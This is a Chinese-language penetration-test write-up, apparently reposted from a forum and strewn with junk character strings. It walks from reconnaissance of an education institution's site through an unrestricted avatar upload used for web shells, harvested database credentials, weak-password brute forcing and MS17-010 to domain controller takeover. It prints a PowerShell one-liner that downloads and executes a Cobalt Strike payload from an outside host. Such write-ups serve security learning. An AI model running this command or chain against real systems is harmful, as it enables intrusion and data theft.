|
! S" j J- L9 ^, U
这次渗透是一个从0到1,从外网到拿下域控的实战过程,希望可以给大家一些思路
( T, P" z9 @/ o$ j# m2 o
9 [: w s% z+ j! y& ^8 k- K* [* o* K* {) C5 U, y
# ~/ C" g' H2 D3 Y2 | . \3 v" W# r u# M% f
. j* Z& A$ j+ \$ E0 e 正文; F0 `+ p- R) L+ t$ R
' i5 i" J8 j/ T
- ^) q9 _7 l- Q4 k) f. s0 b5 n
* j2 U4 l; i0 f4 K' t6 }% n1 m + X% k9 o+ t8 j! i. s6 X
5 o; y1 V* t# O. b6 o: d
目标:www.xxxx.com(一家教育机构)
7 o! `$ Z2 O7 ^) q) h+ W7 u打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能
# E& b3 Z6 B P: `8 V3 a + \# K! ] [- _; ^- `
( o0 e; i0 C# g8 n  6 c( ~8 E! \$ f' B% |
5 L/ H8 p, B+ R3 O/ M/ H
: @. x* C. H8 _" V: X
进行了简单的信息搜集
8 e) o% w: T5 g$ _2 T) g2 }
7 i, N* M' @2 [, P, d b6 |4 _& |& a# m7 V: ? Z& P" Z
7 T# v" I) H& o0 t" c
9 L) B# L( m8 c6 \# I
子域名搜集& B# O" L! S% J) \: w2 R
: B# c9 J) k3 h, i! L
9 }; c. f/ t1 k5 h7 q. A" K 
# L4 Q5 ^2 g# X& ~- B* x
2 [* {+ l% ], Q0 r' X
T& F# K& ?$ u0 w2 h$ L# Q fofa找资产
! Y( ^$ D, U# O! m+ l* c
/ ^ o! b# z1 m: g' M" [
1 D5 t- t- T" K" ` % `$ g; m* q1 A, p0 ?
* ~9 e. F- ]0 y, i- ~6 \1 m; ^
 0 n- [$ d8 x+ _8 f) {
/ c( t" g; S- X- o+ W, ~# P/ R2 Z: c; ?3 d2 E9 x# i
一共七个资产。去重之后只有两个。
, R6 C+ |9 V# ` I7 l; q
6 q, D, e3 ?" N
# h+ l9 z7 @' s" {7 x
9 |& n5 v# G( L" s% j/ P+ B8 u
, K0 h2 y0 ~1 x8 Q) @3 s 目录探测8 \/ M6 B' [: k2 `+ W3 T
% H+ N0 o/ U, { b' ?
P. c+ u* f( R6 R* ]  * Q; D0 b6 D6 x6 B
2 I' S6 j; e& \/ x
- T$ t5 g* T1 P( w0 O 我尝试了暴力枚举,看有没有弱口令之类的,然而并没有
1 B6 t$ t7 h: F9 k- z. J) f( [! [
8 a0 W! ~$ ~1 f8 x$ P. t" v* w+ w* m- R. n( n; F6 j
+ l# {5 U* s9 U! i9 G# T* U5 D5 i, N& u: Q, c( R- L% J
我又尝试了通过修改返回包来绕过登录界面, {3 l% ^% i( [: Q, p- ^
' ~) L9 Y( ?$ V* ^/ N$ l* d
& i' F" C7 l9 o/ W9 z! o 
0 P u5 ]0 Z. o" ~
7 \. z$ u9 b' B* _+ r* @) b
: g8 U7 h6 k: o" ^/ E9 ^ 还是不行,尝试注入无果
e; Y8 ]! l5 F- O
9 Y2 U& a/ j% `, G8 W/ H4 `' k- p" E! f* T
 & U, B$ M7 L& |" Y4 {- B
1 {, p, y0 ?8 }) z9 w4 m
6 {2 G4 G9 G" ]+ p% e+ h( I6 e) U 不过我目录探测出了一处Spring信息泄露
; H& _2 l. Y9 H. z- C% f
+ X' a8 k) `+ w' E! K& P! a# g
6 s3 P3 r' F/ \
* V2 C: A# v; ?1 H6 ^7 m5 x) I( T+ h) p* b% _( H
 3 ^5 ^9 j0 x0 F5 w" ?( l& x
& e- b6 S+ {7 o- g) u. p
( i/ e% b" j. H+ }* l4 I3 A 尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录
+ w9 Q2 ~9 h5 i& {* z $ o- |3 o# R7 k: v! s4 O
1 {0 S1 N' P) G
! J* }+ X' Y7 m9 t* K
9 x- |" R6 v; n. r
2 r0 n6 e) m2 D4 I 后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。
) f; A5 I: A) I3 B) |4 p* c
# D! H% Q2 i0 @4 R; F( w
4 V' I @2 N5 F P" t: \  3 n+ o" o; }) S- u5 g
# O. R' ~" S' Y) w; l. K, J0 s, V- T6 j+ G
获取有些师傅到这一步就手机抓包电脑测了。& R9 x. R! c- f% r+ E0 H) Q
; H- }2 w( e: D" Y) Q
: P! d3 p! y3 b, Y# Y5 S9 {/ @& | Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。
& x8 S; v& Y* O- L# I
4 b, C( Z/ F9 o7 T( y" v" C& o$ f9 K0 D( N F% {" ]
其中在一个公众号发现了小程序,可以进行注册。7 S' r' D1 {' u: c8 `4 Q0 R
' ?% E2 H( F" B. \
9 F' O# m1 M i! T 看到了头像上传,尝试上传获取WebShell
: Z0 ?. b" V& r
% t+ d3 H* F. R- }+ `1 h$ j# _/ }
/ x- n, i$ e- ]+ f( g  ) g; V, H* N6 ]" z/ D8 l8 G& R3 Z3 H
0 f/ o o3 F9 ~; \0 Q4 T3 S; @7 o6 c- x' {$ `5 Z( e
未做任何限制成功GetShell,上了冰蝎马,目录没权限访问
R4 _$ T6 d9 P* i
% b# ]/ I8 [6 u! R+ y9 B' S# d
# [0 A# c6 E4 E3 u- f 
5 ~3 i( G6 W! n1 I ?% N6 p # z; `, x9 e( G1 o6 ]) ^
8 g" o( Y) J2 @( }. O7 o6 o5 p
然后上了大马- r- Z; |+ R5 O) m, Q9 |5 C
3 U1 u5 U+ O( m5 _" c' X3 b( K- }' \
/ T4 d1 b+ o5 f
& [# ~1 d+ Q0 O) ~ - ~' W$ S% j! E' t
. I% y; U( N; G7 n& _3 B' s: U2 s
5 _- _$ Q& L" M1 J1 A: t
, Y7 a% p% v- o3 H j8 ?4 t# m4 q7 p* N$ b& D
通过翻找文件发现数据库账号密码4 `& v5 o2 b: @; b! l' M4 x" C
& a$ {* b1 l5 i* v) L; T- _+ {
( V' _% t! l' y 
# y% F* b9 C( ]
& U$ S# R) r7 E3 G! Y; K# [+ [0 ]6 x/ a, r) M" v3 c
--内网渗透, U+ I2 v8 p9 l
+ ~; [6 ~* q. [5 _2 E9 D+ u: N5 {% D# Y2 X5 U
直接通过powershell执行 cs上线- ~$ z+ ~; a* L* e# F
+ {% X: X6 X9 n( q
! g! F3 k5 `9 s; `0 ^( V- d powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))"
' x# y# q7 ]9 G ' H3 {! i( v7 `+ d. H, O
, h% v3 M E* E/ h+ Q7 J" q
 7 l$ ]9 S8 R- r# A
, _2 y! D: D) `/ H# d% H
& [8 T) y. Z* [
进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破
0 p. `# M" v8 L% [4 b 7 p; J5 ^# j; ~3 K3 s
: P) T) c: l9 M4 h
* F' ^# Q. x/ z: L! L: v) `+ ^& M" Z8 n 4 |( }8 N6 t" g/ q
; H( W4 M& A5 A
登录爆破出来的服务器,发现多网卡且存在逻辑隔离。
c- G# P' F! w( |/ y
5 l k I9 a: V9 H y) o( I6 I. C
* e% E0 O) _; K4 H3 _" @ e- c, d
. y. `6 K! E8 `0 F3 q Y0 v ) @! [! _9 A- l
, b9 a% Q* |% d5 s/ c$ E 
& T2 V8 Z( V" P' a6 |1 n6 _ } : J# y$ `) o5 z/ d9 M, f% O; a; G
* B& b5 W! o4 b% M
通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭
E, R. h3 Y7 P. \1 |
0 |, Y& a a$ P* D; p; S
5 @: d) {) A8 r8 S8 v0 u$ O
3 e7 }" Z/ w" l0 w* e; P
1 o2 c4 C7 A5 l: q+ J: \  . h$ x/ g1 ~% U: J
5 S+ e: H3 s5 Y9 I; e/ w$ g3 r3 ]7 {9 h+ K7 w! s6 {; k' \
$ i: [; M# k# Q \9 r
7 _. ~# I; g7 u+ p- L+ N2 C
4 C8 u" R8 P x- Y' X3 J
) B+ k7 x0 d: B$ I, x5 W
9 P, @+ ~0 Q, [1 d$ N2 _% ~/ C5 [4 H
@* ^, @) l0 s( o4 S% n* M
! J. n( ^- W+ M
- y! ^& o' f( \4 M$ A7 i7 M+ {% S/ ~ 小结/ z1 n4 d4 L u$ [6 Z! T
: K2 B. r! [4 n; O# Q
U" A+ a4 [5 r3 i6 F5 X( E
" W6 T4 {4 E6 h3 y u
, N# R3 o* v2 `4 i+ f
M2 x% ?) I; M" |- M 在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路!4 B" j/ m' O4 d+ h* l: A3 N
( X$ d+ j& S, B9 `" o
4 |# Q) H$ j$ n9 I( @7 J
! z4 W E% `5 M! ~% Y
# R! @, t/ Y/ l" X# h; C. x0 ^! l$ H+ \/ k# m0 a. c
- * ^' Y- l" ]: C0 m' \6 K
0 v. e' q7 o/ m, m; o% s
, f( D* {& r4 M- }0 z, r# A
-
! }/ j9 _# C5 O8 o+ @3 w
- E+ X( j S8 y
: `) a: n, ?) B4 X( s( U- A/ N; T# D . A- O; r7 R$ {! P9 l
$ e; A* f) L5 U+ U* ]+ j. n( ~
作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html; U) ~1 V; R0 {& t# t
2 }2 f: _' E- @5 s* `4 v! F
! z7 ]3 u7 W3 s9 K, ]
# \* h( Z# g y; ^+ J" K# P' {' u: w | 
发表于 2024-3-1 19:41:32
收藏
支持
反对